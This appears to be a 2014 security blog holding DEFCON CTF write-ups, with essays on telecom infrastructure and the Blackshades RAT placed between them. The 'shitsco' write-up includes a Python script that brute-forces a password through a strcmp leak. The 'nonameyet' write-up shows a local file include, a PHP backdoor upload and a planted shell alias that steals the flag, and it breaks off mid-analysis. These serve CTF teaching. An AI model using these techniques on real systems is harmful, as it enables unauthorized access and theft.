.text:08049253                 mov     [esp+4Ch+n], 20h ; n
.text:0804925B                 mov     [esp+4Ch+src], eax ; src
.text:0804925F                 mov     [esp+4Ch+dest], ebx ; dest
.text:08049262                 call    _strncpy
.text:08049267
.text:08049267 loc_8049267:                            ; CODE XREF: enable+EDj
.text:08049267                 mov     [esp+4Ch+src], ebx ; s2
.text:0804926B                 mov     [esp+4Ch+dest], offset password_mem ; s1
.text:08049272                 call    _strcmp
.text:08049277                 mov     [esp+4Ch+var_14], eax
.text:0804927B                 mov     eax, [esp+4Ch+var_14]
.text:0804927F                 test    eax, eax
.text:08049281                 jz      short loc_80492B8
.text:08049283                 mov     [esp+4Ch+n], ebx
.text:08049287                 mov     [esp+4Ch+src], offset aNope_ThePasswo ; "Nope.  The password isn't %s\n"
.text:0804928F                 mov     [esp+4Ch+dest], 1
.text:08049296                 call    ___printf_chk
.text:0804929B
.text:0804929B loc_804929B:                            ; CODE XREF: enable+A5j
.text:0804929B                 mov     [esp+4Ch+dest], esi
.text:0804929E                 call    sub_8049090
.text:080492A3                 mov     eax, [esp+4Ch+cookie]
.text:080492A7                 xor     eax, large gs:14h
.text:080492AE                 jnz     short loc_8049322
.text:080492B0                 add     esp, 44h
.text:080492B3                 pop     ebx
.text:080492B4                 pop     esi
.text:080492B5                 retn
.text:080492B5 ; ---------------------------------------------------------------------------
.text:080492B6                 align 4
.text:080492B8
.text:080492B8 loc_80492B8:                            ; CODE XREF: enable+51j
.text:080492B8                 mov     [esp+4Ch+dest], offset aAuthentication ; "Authentication Successful"
.text:080492BF                 mov     ds:admin_privs, 1
.text:080492C9                 mov     ds:prompt, 23h
.text:080492D0                 call    _puts
.text:080492D5                 jmp     short loc_804929B
.text:080492D5 ; ---------------------------------------------------------------------------
.text:080492D7                 align 4
.text:080492D8
.text:080492D8 loc_80492D8:                            ; CODE XREF: enable+19j
.text:080492D8                 mov     [esp+4Ch+src], offset aPleaseEnterAPa ; "Please enter a password: "
.text:080492E0                 lea     ebx, [esp+4Ch+s2]
.text:080492E4                 mov     [esp+4Ch+dest], 1
.text:080492EB                 call    ___printf_chk
.text:080492F0                 mov     eax, ds:stdout
.text:080492F5                 mov     [esp+4Ch+dest], eax ; stream
.text:080492F8                 call    _fflush
.text:080492FD                 mov     dword ptr [esp+4Ch+term], 0Ah ; term
.text:08049305                 mov     [esp+4Ch+n], 20h ; a3
.text:0804930D                 mov     [esp+4Ch+src], ebx ; a2
.text:08049311                 mov     [esp+4Ch+dest], 0 ; fd
.text:08049318                 call    read_n_until
.text:0804931D                 jmp     loc_8049267
.text:08049322 ; ---------------------------------------------------------------------------
.text:08049322
.text:08049322 loc_8049322:                            ; CODE XREF: enable+7Ej
.text:08049322                 call    ___stack_chk_fail
.text:08049322 enable          endp

Here is the C decompiled version of the function that is a bit clearer:

int __cdecl enable(const char **a1)
{
  const char *v1; // ebx@2
  char s2[32]; // [sp+18h] [bp-34h]@2
  int v4; // [sp+38h] [bp-14h]@3
  int cookie[4]; // [sp+3Ch] [bp-10h]@1

  cookie[0] = *MK_FP(__GS__, 20);
  if ( *a1 )
  {
   v1 = s2;
   strncpy(s2, *a1, 32u);
  }
  else
  {
   v1 = s2;
   __printf_chk(1, "Please enter a password: ");
   fflush(stdout);
   read_n_until(0, (int)s2, 32, 10);
  }
  v4 = strcmp((const char *)password_mem, v1);
  if ( v4 )
  {
   __printf_chk(1, "Nope.  The password isn't %s\n", v1);
  }
  else
  {
   admin_privs = 1;
   prompt = '#';
   puts("Authentication Successful");
  }
  sub_8049090((void **)a1);
  return *MK_FP(__GS__, 20) ^ cookie[0];
}

I’ve labeled a few things here like the local variables and the recv_n_until function. Notice that s2 or [esp+4Ch+src] is the destination buffer for the password we enter. It also looks possible to run enable < password > and not get prompted for the password. This results in a strncpy and the other prompting path read the password with a call to recv_n_until. Here is the interesting thing: When I tried the strncpy code path, I did not get the leak behavior:

$ enable
Please enter a password: AAAAA
Nope.  The password isn't AAAAA`x▒@dx▒▒▒`▒d▒`▒▒▒z▒
$ enable AAAAA
Nope.  The password isn't AAAAA
$

So, what is the difference? Let’s have a quick look at the strncpy man page, namely the bit that says “If the length of src is less than n, strncpy() writes additional null bytes to dest to ensure that a total of n bytes are written.” On the prompting code path, our string is not being null terminated but if we enter the password with the enable command it is null terminated. We can also see that the s2 variable on the stack is never initialized to 0. There is no memset call.

Still we don’t have the password. It doesn’t exist in the leaked data. Leaks are very useful in exploitation as a defeat to ASLR. We might have enough information here to recover base addresses of the stack or libc. However, the path we are on to get the flag does not involve taking advantage of memory corruption. Is there anything in this leak that could give us something useful?

To answer this question let’s look at the stack layout and what is actually getting printed back to us:

.text:08049230 dest            = dword ptr -4Ch
.text:08049230 src             = dword ptr -48h
.text:08049230 n               = dword ptr -44h
.text:08049230 term            = byte ptr -40h
.text:08049230 s2              = byte ptr -34h
.text:08049230 var_14          = dword ptr -14h
.text:08049230 cookie          = dword ptr -10h
.text:08049230 arg_0           = dword ptr  4

Therefore, if we are copying into s2 and we only leak data after the 4th character, we can assume that by default in the uninitialized stack there is a null at s2[3]. Overwriting this with user data causes our string to not terminate until we run into a null later on up the stack. What is var_14?

v4 = strcmp((const char *)password_mem, v1);

It turns out that var_14 (or v4) is the return from strcmp. Hummm. Here is what the main page has to say about that “The strcmp() and strncmp() functions return an integer less than, equal to, or greater than zero if s1 (or the first n bytes thereof) is found, respectively, to be less than, to match, or be greater than s2.” What this means is that we can tell if our input string is less than or greater than the password on the remote machine. Let’s try it locally first. Our password locally is “asdf”. Let’s see if we can divine the first character using this method. The var_14 variable should be the 33rd character we get back:

shitsco@ubuntu:~$  python -c "import sys;sys.stdout.write('enable\n' + ''*80 + '\n')" | ./shitsco |xxd
…
0000210: 2070 6173 7377 6f72 643a 204e 6f70 652e   password: Nope.
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2020 2020 2020 2020 2020 2020  sn't
0000240: 2020 2020 2020 2020 2020 2020 2020 2020
0000250: 2020 2020 2001 0a24 200a 2020 2020 2020       ..$ .

I picked the space character for our password because on the ascii table space (0x20) is the lowest value printable character. We can see that the bit in bold here was 0x0100 as var_14. The null after the 0x1 is implied. Now, what happens if we set this to ‘a’ + 79 spaces?

shitsco@ubuntu:~$ python -c "import sys;sys.stdout.write('enable\na' + ''*79 + '\n')" | ./shitsco |xxd
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2061 2020 2020 2020 2020 2020  sn't a
0000240: 2020 2020 2020 2020 2020 2020 2020 2020
0000250: 2020 2020 2001 0a24 200a 2020 2020 2020       ..$ .
0000260: 2020 2020 2020 2020 2020 2020 2020 2020

Remember, that ‘a’ was actually the first character of our password locally and we still got a 0x1 back. How about ‘b’?

shitsco@ubuntu:~$ python -c "import sys;sys.stdout.write('enable\nb' + ''*79 + '\n')" | ./shitsco |xxd
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2062 2020 2020 2020 2020 2020  sn't b
0000240: 2020 2020 2020 2020 2020 2020 2020 2020
0000250: 2020 2020 20ff ffff ff0a 2420 0a20 2020       .....$ .
0000260: 2020 2020 2020 2020 2020 2020 2020 2020

Bingo. Here we have a value of 0xffffffff for var_14. Therefore, we know that the string we sent in is numerically higher than the actual password. The last character we tried, ‘a’, was still giving us back 0x01. When we see the value of var_14 change to -1 we know that the correct character was not the most recent attempt but the one prior to it. We can send all characters sequentially until we find the password.

Automation

The password used on the remote server is probably short enough that we could disclose it by hand. However, as a general rule in life, if I have to do something more than a few times I almost always save time by writing a quick python script to automate. Since we are going to be running this on a remote target I’ve set the server to run over a TCP port with some fancy piping over a fifo pipe.

shitsco@ubuntu:~$ mkfifo pipe
shitsco@ubuntu:~$ nc -l 31337 < pipe | ./shitsco > pipe

Here is a python script that will discover the password used. I’ve changed the password file on my local system to the one that was used during the game:

import socket
import string
import sys

s=socket.socket()

s.connect(("192.168.1.151", 31337))
s.recv(1024)

def try_pass(passwd):
s.send("enable\n")
s.recv(1024)
s.send(passwd + "\n")
ret = s.recv(1024)
if ret.find("Authentication Successful") != -1:
return "!"
return ret[ret.find("$")-2]

chars = []
for x in string.printable:
chars.append(x)
chars.sort()

known = ""
while 1:
prev = chars[0]
for x in chars:

i = try_pass(known + x + "" * (30-len(known)))
if ord(i) == 0xff:
known += prev
break
prev = x

i = try_pass(known[:-1]+x+"\x00")
if i == '!':
print "Enable password is: %s" % (known[:-1]+x)
sys.exit()

Running the script produces the output:

$ python shitsco.py
Enable password is: bruT3m3hard3rb4by

Excellent, let’s connect to the service with netcat and retrieve the flag:

$ nc shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me 31337

 oooooooo8 oooo        o88    o8
888         888ooooo   oooo o888oo  oooooooo8    ooooooo     ooooooo
 888oooooo  888   888   888  888   888ooooooo  888     888 888     888
       888 888   888   888  888           888 888         888     888
o88oooo888 o888o o888o o888o  888o 88oooooo88    88ooo888    88ooo88

Welcome to Shitsco Internet Operating System (IOS)
For a command list, enter ?
$ enable bruT3m3hard3rb4by
Authentication Successful
# flag
The flag is: 14424ff8673ad039b32cfd756989be12

All that’s left to do is submit the flag and score points!

I’ll be posting another challenge and solution from the CTF soon, so if you found this one interesting, be sure to check back for more.

↧

Telecom as Critical Infrastructure: Looking Beyond the Cyber Threat

May 22, 2014, 11:30 am

≫ Next: Blackshades: Why We Should Care About Old Malware

≪ Previous: DEFCON Capture the Flag Qualification Challenge #1

Much of the discussion around cyber security of critical infrastructure focuses on the debilitating impact of a cyber attack on a country’s energy, economic, and transportation backbone. But Russia’s recent actions suggest an elevation of telecommunications as the most critical of all infrastructures—and the one it deems most worthy of protecting, not only because of the risks it may face, but also because of its potential as a mechanism for advancing national interests.

In March 2014, cyber attacks between Russia and Ukraine began when unknown hackers attacked Russian central bank and foreign ministry websites, and Ukrainian government websites were hit by an onslaught of 42 attacks during the Crimean vote for secession. Amid this back-and-forth volley of cyber attacks, Russia has quickly and quietly invested almost $25 million to provide Internet and telecom infrastructure in Crimea by deploying a fiber-optic submarine telecom link between the mainland and its newest territory. Rather than focusing on switching water, transportation, or electricity to Russian infrastructure, it has prioritized the establishment of telecommunications networks, turning this critical infrastructure into a tactic in and of itself.

By owning the telecom connections into Crimea, Russia ensures security for its communications there and eliminates Ukrainian disruptions. Russia’s telecom investments suggest that in the 21st century, national priorities in times of conflict have been reorganized around the assurance of secure telecommunications even before the assurance of traditional critical infrastructure security.

The threats to critical infrastructure are real and significant, but this prioritization of telecommunications as a tool of international relations suggests that we should pay attention not only to the cyber security risks to critical infrastructure, but also to how countries are using this very infrastructure as a tactic during times of conflict.

↧

Blackshades: Why We Should Care About Old Malware

May 28, 2014, 11:30 am

≫ Next: DEFCON Capture the Flag Qualification Challenge #2

≪ Previous: Telecom as Critical Infrastructure: Looking Beyond the Cyber Threat

“Blackshades is so 2012” is the near response I received when I mentioned to a friend the recent FBI takedown of almost 100 Blackshades RAT dealers. This nonchalant, almost apathetic attitude towards older malware struck a nerve with me, since I’ve known network defenders and incident responders with the same sentiment. If the malware isn’t fresh, or if it’s perceived as old, they don’t want any part of it. While that attitude isn’t necessarily the norm, it does serve as a reminder that malware never truly dies–it just keeps on compromising. In fact, more than a half million computers in over 100 countries were reportedly recently infected by the Blackshades malware.

The FBI arrests are indicative of the omnipresence of malware even after it has been identified. In addition to the arrests, the FBI seized more than 1,900 domains used by Blackshades users to control their victims’ computers. Despite these seizures, countless systems from around the globe continue to attempt connections with their respective Blackshades Command and Control (CnC) domains. And there’s really no telling how many people have a copy of the RAT. Blackshades has been around for a while, and with a sales price of $40, it’s also quite affordable–not to mention the fact that the source code was leaked in 2010. It seems likely that there are a number of Blackshades RAT controllers still at large.

What does Blackshades actually do? Just about anything the controller wants. Lately, the news around Blackshades has focused on its use as “Creepware,” in which a victim’s webcam is turned on remotely. But the RAT can do much more than that. For example, a couple of years ago the Blackshades Stealth version advertised the following capabilities:

General Computer Information (local IP, username, operating system (OS), uptime, webcam, etc.)
Screen, Webcam, and Voice Capture
Keylogger, File Manager, Processes, Password Recovery, Ping
Download and Execute, Shell, Maintenance (reconnect, close, restart, uninstall)
Open Windows (shows what applications are open)
Mac Compatible Client

There were other versions, too. The Blackshades Radar, for example, advertised the ability to set keywords to listen for in either the window title or written text. This would then trigger a key-logger to start logging keystrokes for a controller-specified amount of time, and the data collected would be sent back to the controller via email. This capability helped attackers pinpoint and exfiltrate a desired set of data, without a lot of excess key-logged chaff. Blackshades Recover advertised the ability to collect passwords, CD keys, and product keys for hundreds of popular software applications. And Blackshades Fusion advertised its ability to incorporate many of the previously described functions.

With such an impressive resume of capabilities, it’s no wonder the Syrian government used Blackshades, along with RAT-siblings Dark Comet and Gh0stRAT, against Syrian activists in early 2012. And even though that campaign may also be “so 2012” to some, the well-reported CnC domain used (alosh66(dot)servecounterstrike(dot)com) is still very much alive and kicking. In fact, according to various sources, there have been over 21,000 connection attempts for the domain this year from several countries around the globe, including from the U.S., with the majority coming from a Syrian Internet Service Provider. If this number for alosh66(dot)servecounterstrike(dot)com is accurate, and if that number holds true for the 1,900 domains ceased by the FBI, that would equate to potentially 39,879,000 connection attempts to Blackshades CnC domains since January 1, 2014. Fortunately, the domain has essentially been terminated, as it has been resolving to 0.0.0.0 since 2012, but it’s possible that the controller could have reconfigured those systems to communicate via a different CnC domain, meaning all of the aforementioned systems could be actively infected.

While the exact number of infected systems cannot be determined, the recent arrests illustrate the longevity of malware. The cybercrime landscape not only includes new and emerging threats, but also requires constant assessment of older malware. Regardless of how many systems are infected by the Blackshades RAT, the FBI arrests truly highlight the fact that the war on cybercrime is in full swing.

↧

DEFCON Capture the Flag Qualification Challenge #2

June 3, 2014, 11:30 am

≫ Next: How to Get Started in CTF

≪ Previous: Blackshades: Why We Should Care About Old Malware

This is my second post in a series on DEFCON 22 CTF Qualifications. Last time I examined a problem called shitsco and gave a short overview of CTF. This week, I’d like to walk you through another DEFCON Qualification problem: “nonameyet” from HJ. This problem was worth 3 points and was opened late in the game. It was solved by 10 teams but, sadly, my team, Samurai, was not one of them. I managed to land this one about an hour after the game ended. It’s a common theme among CTF players that they don’t stop after the game ends. There’s always some measure of personal pride on the line when it comes to solving these problems, regardless of points earned.

The problem description for nonameyet is:

I claim no responsibility for the things posted here. nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me:80

There is no download link provided and the service is running on port 80. We are to assume that this is a web challenge. Browsing to the web application I see that it allows users to upload photos to a /photos directory, hence the disclaimer in the problem description. Whenever a file upload capability is involved in a CTF web challenge, you can bet that it will be a source of a vulnerability. I have yet to see a web application problem in a CTF that provided a counter example.

One of the URLs for the web application looked like this:

http://nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me/index.php?page=xxxxxxx

When I see page=xxxxxxx referencing a filename there is potential for a local file include vulnerability. Indeed, if I visit:

http://nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me/index.php?page=/etc/passwd

I am able to view the shadowed password file on the server. So far, so good. Unfortunately, asking for the flag file directly yields an error. Of course, a 3 point problem would never be so easy in this CTF. Let’s turn our attention back to the file upload.

The page with the HTML for the upload form is upfile.html. This is loaded with a “?page=upfile.html” on the end of the URL. Examining the HTML source code on this file shows that our form data is submitted to /cgi-bin/nonameyet.cgi. We can recover this CGI program with a simple wget command:

 $ wget http://nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me/index.php\?page\=cgi-bin/nonameyet.cgi

$ file nonameyet.cgi

nonameyet.cgi: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped

You can find a copy of nonameyet.cgi here.

More interestingly, it is also possible to use the upload form to upload anything at all. This just begs to have a PHP backdoor uploaded to the system. We put a simple PHP file manager on nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me...and used that to look around the directory structure and permissions placed on the files. Specifically, we could see that the /home/nonameyet/flag file was owned by nonameyet:nonameyet. I need to gain execution as this user to retrieve the flag. The web server executing the PHP scripts (including our backdoor) was running as the web server user.

It is important to note that getting a shell on a box provides an opportunity for many new attack vectors. For this problem, it was actually solved by other teams editing the file /home/nonameyet/.bash_aliases to include an alias that would copy the /home/nonameyet/flag file to /tmp with world readable permissions. The next time anyone popped a shell on this box and ran “ls” they would hand the flag over to another team. This was a very clever and devious thing to do—and in some sense, this is what CTF is all about.

I believe that having this file editable was an oversight on the part of the organizers. This file should not have been writeable. It was a great advantage for the teams that realized this mistake because they were free to look at other problems while waiting for someone else to come along and solve it the “legitimate” way. Furthermore, anyone that thought to look in /tmp before the flag was cleaned up could score points too. Lesson learned: Always poke around more and possibly set up some sort of monitoring for these kinds of issues. I wish I had thought of this first!

Binary Analysis

I went straight for the binary in the problem. The binary was not marked SUID so there must be some webserver magic launching the CGI program as the nonameyet user. Indeed, HJ confirmed that he was using a modified version of suexec after the game. I have already run a file command to see that the CGI program is an ELF 32-bit program. My usual next step is to run strings.

$ strings nonameyet.cgi
…

I see imports for C functions related to string parsing and file operations including dangerous APIs like strcpy() and sprintf(). I see a list of the errors the CGI program will return and input variables like photo, time, and date. There are some chunks of HTML and HTTP headers too. So far, it is a fairly typical CGI program. If you try to run it you will get an error 900 printed out to you with HTML tags. A quick strace shows that it is looking for the photos directory. Create this directory and you will move on to the program prompting you for input. Just enter ^D to signal an end of file and you will receive an error 902. Back to the strings. One string that really caught my eye was the “cgilib” string. This is indicative of a cgilib library. There were other strings that pointed to a library as well, such as the “/tmp/cgilibXXXXXX” string.

Cgilib is a “library [that] provides a simple and lightweight interface to the Common Gateway Interface (CGI) for C and C++ programs. Its purpose is to provide an easy to use interface to CGI for fast CGI programs written in the C or C++ programming language.” It is also an open source project. We can see from the output of the file command that the nonameyet.cgi program is dynamically linked, so let’s take a quick peek with ldd to see if cgilib is statically compiled into the binary or dynamically loaded at runtime from our system library.

$ ldd nonameyet.cgi
    linux-gate.so.1 =>  (0xb77dd000)
    libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb761e000)
    /lib/ld-linux.so.2 (0xb77de000)

We do not see cgilib on the list returned form ldd, so the cgilib library is statically linked. That is to say that if the cgilib binary is used in this program, it must have been compiled into the binary, which means that I could have source code for a good chunk of this problem. That would be a great aid in the reverse engineering process. One way to match up statically compiled libraries into CTF binaries is to use the IDA Pro FLAIR tool to generate a FLIRT signature that can be applied to the binary.

Which version of the library should I grab? The reverse lookup on the IP address used for this problem pointed to an Amazon EC2 server. I created an EC2 instance running the latest version of Ubuntu and applied all updates. It is important to mirror the game box as closely as possible. It is even better if we can run from the same ISP. I installed cgilib with this command:

$ sudo apt-get install cgilib

This added a file in /usr/lib/cgilib.a. I pulled this file back to my analysis machine with FLAIR installed and ran:

C:\> pelf -a libcgi.a
C:\> sigmake -n "libcgi" libcgi.pat libcgi.sig

The first command “pelf” will parse the library file and generate patterns for all exported symbols. The output of the command is put into the libcgi.pat file. The next “sigmake” command will read from the libcgi.pat file and create a binary representation that is output in the libcgi.sig file. This sig file can then be copied into the IDA Pro /sig directory and applied to a live database. All of this completely failed. No symbols were applied. I have not identified why. Bummer.

Thankfully, the library is very simple and almost all of the functions contain unique strings. We can download the source code for libcgi, find a function we are interested in, find a string used in that function, then find the same string in IDA Pro. Once we find the string in IDA we can press ‘x’ while the cursor is positioned on that string to find cross-references. If we follow the (hopefully) single cross-reference that exists, we can then name the function referencing that string as it is named in the source code for cgilib. It is a bit slower than FLIRT signatures but we will be able to flag a significant portion of the program as “uninteresting” right away. For example, if we look at the cgiReadFile function in the cgilib source code cgilib-0.7/cgi.c:

char *cgiReadFile (FILE *stream, char *boundary)
{
    char *crlfboundary, *buf;
    size_t boundarylen;
    int c;
    unsigned int pivot;
    char *cp;
    char template[]= "/tmp/cgilibXXXXXX";
    FILE *tmpfile;
    int fd;

We can then find the /tmp/cgilibXXXXXX string in IDA Pro with a “search sequence of bytes”.

Image may be NSFW.
Clik here to view.

This will fail! As it turns out, there is a compiler optimization used on this function causing the string to be loaded as an immediate value on the stack. This is also sometimes used in programs that want to make string analysis more difficult on the reverse engineer. Indeed, if we go back and look at the string output our first clue is there:

~$ strings nonameyet.cgi
…
/tmp
/cgi
libX
XXXXf
…

They are broken up into groups of 4. This is because they are referenced as immediate DWORD values being moved into memory. Let’s repeat the search using a smaller string. If we search for “/tmp” we see exactly one spot in the binary where this appears. Here is how IDA shows the string data being loaded onto the stack:

Image may be NSFW.
Clik here to view.

We can now go to the top of this function and name it (‘n’ key) “cgiReadFile.” If you go through the rest of cgi.c you will end up with the following functions named:

Image may be NSFW.
Clik here to view.

The function named cgi_print (my name, not the cgilib name) is frequently called to output error messages that would be useful for debugging purposes. A quick look at this function reveals that if we set dword_804f0dc (normally 0 in the .bss) to something greater than arg0 (I assume this is a logging level?) we can get debugging output from the binary. In gdb the command to do this is:

int __usercall main@<eax>(char *a1@<esi>)
{
  int result; // eax@2
  void *v2; // eax@15
  int v3; // [sp+1Ch] [bp-4Ch]@1
  int v4; // [sp+20h] [bp-48h]@9
  int v5; // [sp+24h] [bp-44h]@5
  int v6; // [sp+28h] [bp-40h]@9
  int v7; // [sp+2Ch] [bp-3Ch]@5
  int v8; // [sp+30h] [bp-38h]@9
  int v9; // [sp+34h] [bp-34h]@5
  int v10; // [sp+38h] [bp-30h]@9
  int v11; // [sp+3Ch] [bp-2Ch]@5
  int v12; // [sp+40h] [bp-28h]@9
  int v13; // [sp+44h] [bp-24h]@5
  int v14; // [sp+48h] [bp-20h]@9
  size_t file_size; // [sp+4Ch] [bp-1Ch]@1
  const void *v16; // [sp+50h] [bp-18h]@1
  void *s_cgi; // [sp+54h] [bp-14h]@1
  int photo; // [sp+58h] [bp-10h]@1
  int v19; // [sp+5Ch] [bp-Ch]@1

  v16 = 0;
  file_size = 0;
  s_cgi = 0;
  photo = 0;
  v19 = 0;
  memset(&v3, 0, 0x30u);
  s_cgi = cgiInit();
  v19 = open("./photos", 0);
  if ( v19 == -1 )
  {
    write_headers();
    printf("<p>ERROR: 900</p>");
    result = 0;
  }
  else if ( fchdir(v19) == -1 )
  {
    write_headers();
    printf("<p>ERROR: 901</p>");
    close(v19);
    result = 0;
  }
  else
  {
    close(v19);
    photo = cgiGetFile((int)s_cgi, "photo");
    v3 = cgiGetValue((int)s_cgi, "base");
    v7 = cgiGetValue((int)s_cgi, "time");
    v9 = cgiGetValue((int)s_cgi, "date");
    v11 = cgiGetValue((int)s_cgi, "pixy");
    v13 = cgiGetValue((int)s_cgi, "pixx");
    v5 = cgiGetValue((int)s_cgi, "genr");
    if ( photo )
    {
      if ( !v3 )
        v3 = *(_DWORD *)(photo + 8);
      v4 = urldecode(v3);
      v8 = urldecode(v7);
      v6 = urldecode(v5);
      v10 = urldecode(v9);
      v12 = urldecode(v11);
      v14 = urldecode(v13);
      v16 = read_file(*(char **)(photo + 12), (int)&file_size);
      if ( v16 )
      {
        if ( file_size )
        {
          if ( (interesting((int)&file_size, a1, (int)&v3) & 0x80000000) == 0 )
          {
            v2 = base64encode(v3, v4);
            combine_strings("Cookie", v2);
            write_headers();
            cgiFree(s_cgi);
            v19 = open((const char *)v3, 66, 420);
            if ( v19 == -1 )
            {
              printf("<p>ERROR: 906</p>", v3);
            }
            else
            {
              write(v19, v16, file_size);
              close(v19);
            }
            printf("<meta http-equiv='refresh' content='0;url=../thanks.php'>");
            result = 0;
          }
          else
          {
            write_headers();
            printf("<p>ERROR: 905</p>");
            result = 0;
          }
        }
        else
        {
          write_headers();
          printf("<p>ERROR: 904. Why the hell would you give me an empty file</p>");
          result = 0;
        }
      }
      else
      {
        write_headers();
        printf("<p>ERROR: 903</p>");
        result = 0;
      }
    }
    else
    {
      write_headers();
      printf("<p>ERROR: 902</p>");
      result = 0;
    }
  }
  return result;
}

When looking at a CTF problem, you should always be asking yourself “What is happening with my input?” Most of the parsing happens right up front in the cgiInit() function. This function will read and parse CGI input and set up the s_cgi structure. This function first checks for the environment variable CONTENT_TYPE. CGI input is usually passed via environment variables and stdin from the webserver. If this environment variable is not set then the program will read variables from stdin.

If the CONTENT_TYPE variable is set to “multipart/form-data” it will parse out a boundary condition from the variable and call off into the cgiReadMultipart() function before returning. If the CONTENT_TYPE variable is anything else, the program then looks for the REQUEST_METHOD and CONTENT_LENGTH environment variables.

For a REQUEST_METHOD of “GET” the environment variable QUERY_STRING is parsed and for a REQUEST_METHOD of “POST” stdin is parsed. If none of these are specified then the cgiReadVariables() function will prompt for input from the command line. This is very handy for quick testing. The cgiInit() function will also parse cookie information. All of this was learned by reading the cgilib source code for cgiInit().

We have five code paths for parsing our input: multipart, get, post, stdin, and cookies. All of these are standard in cgilib. Which code path should we explore first? Let’s start with the simplest form, no environment variables, and data parsed directly from stdin.

$ python -c "print 'asdf=asdf'" | ./nonameyet.cgi
	(offline mode: enter name=value pairs on standard input)
	Content-type: text/html<p>ERROR: 902</p>

Here we just set a variable asdf = asdf and we are returned error 902, the same as if we passed in no input. Looking back to main() we can easily spot where “ERROR: 902” is printed inside of an else block. Look up to the if condition on that else block and we see that this is because photo = cgiGetFile((int)s_cgi, “photo”); returned NULL. Setting the photo variable from stdin also produces the same error. The cgiGetFile() call did not find a variable called photo registered in the s_cgi structure. There is another interesting behavior here if we set the same variable twice:

$ python -c "print 'asdf=asdf\nasdf=asdf'" | ./nonameyet.cgi
	(offline mode: enter name=value pairs on standard input)
	Segmentation fault (core dumped)

Crashes are usually really good in a CTF competition. Going into this with a debugger we find:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi
(offline mode: enter name=value pairs on standard input)
asdf=asdf
asdf=asdf

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x4
ECX: 0xb7fcf448 --> 0x8050080 --> 0x66 ('f')
EDX: 0x8050078 ("asdf\nasdf")
ESI: 0x0
EDI: 0x805008d --> 0x0
EBP: 0xbffff668 --> 0xbffff698 --> 0xbffff708 --> 0x0
ESP: 0xbffff590 --> 0x0
EIP: 0x804bb5d (mov    edx,DWORD PTR [eax+0x4])
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804bb52:   shl    eax,0x2
   0x804bb55:   add    eax,DWORD PTR [ebp-0x84]
   0x804bb5b:   mov    eax,DWORD PTR [eax]
=> 0x804bb5d:   mov    edx,DWORD PTR [eax+0x4]
   0x804bb60:   mov    eax,DWORD PTR [ebp-0x98]
   0x804bb66:   shl    eax,0x2
   0x804bb69:   add    eax,DWORD PTR [ebp-0x84]
   0x804bb6f:   mov    eax,DWORD PTR [eax]
[------------------------------------stack-------------------------------------]
0000| 0xbffff590 --> 0x0
0004| 0xbffff594 --> 0x804d483 ("%s\n%s")
0008| 0xbffff598 --> 0x8050058 --> 0x0
0012| 0xbffff59c --> 0x8050088 --> 0x8050050 --> 0x0
0016| 0xbffff5a0 --> 0xb7fff55c --> 0xb7fde000 --> 0x464c457f
0020| 0xbffff5a4 --> 0x3
0024| 0xbffff5a8 --> 0x0
0028| 0xbffff5ac --> 0xffffffff
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0804bb5d in ?? ()
gdb-peda$

I should mention that I am using PEDA with GDB. It makes exploit development tasks a lot easier than standard GDB. I encourage you to check it out and explore how it works. Anyway, this is a NULL pointer dereference crash. The register EAX is being dereferenced. EAX is NULL. As a result, the program sends a signal 11 or SIGSEGV and we terminate execution. The buggy code seems to be in cgilib/cgi.c on line 644 when they attempt to do:

644:	cgiDebugOutput (1, "%s: %s", result[i]->name, result[i]->value);

It looks to me like they used the incorrect index into the result array. There is another index counter called k used earlier in the code that accounts for duplicate variable name. My guess is that this line was simply copy and pasted from line 630 and the developers did not change ‘i’ to ‘k’. Either way, I am not sure if a web server would ever generate input to a CGI program like this, and unless we can somehow allocate the NULL address space on the remote server, this is not likely to be an interesting crash when solving the CTF problem. Interesting, but ultimately useless.

Back to our problem. The photo variable is NULL. Looking back in cgi.c source code for cgiGetFile() it is easy to spot that this information comes from s_cgi->files. Ok, that makes sense. However, the only code path that sets this information is when we have a CONTENT_TYPE of “multipart/form-data”. This was discovered with a quick grep for “->files” in the cgilib source code to find something that writes to this variable. The one place this happens is in the cgiReadMultipart() function. Let’s jump into feeding this program multipart data.

I used Wireshark to perform a packet capture on the data that was being sent by my browser when submitting a form to nonameyet.cgi. After all, the browser should already generate everything we need. With a quick copy and paste and setting up lines to end with \r\n instead of \n I now have the following setup to get multipart data parsed by the CGI program:

$ export CONTENT_TYPE="Content-Type: multipart/form-data; boundary=---------------------------13141138687192"

$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="test"
Content-Type: application/octet-stream

test

-----------------------------13141138687192--

Remember each line ends with \r\n. After I set up the formdata file and my environment variable, let’s see if we can get past that error 902 output. I will also turn on the debug output with the debugger after breaking on main():

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ break *0x0804906D
Breakpoint 1 at 0x804906d
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata
Breakpoint 1, 0x0804906d in ?? ()
gdb-peda$ set {int}0x804F0DC=1000
gdb-peda$ c
Continuing.
Content-Type: Content-Type: multipart/form-data; boundary=---------------------------13141138687192
Read line '-----------------------------13141138687192'
Read line 'Content-Disposition: form-data; name="photo"; filename="test"'
Found field name photo
Found filename test
Read line 'Content-Type: application/octet-stream'
Found mime type application/octet-stream
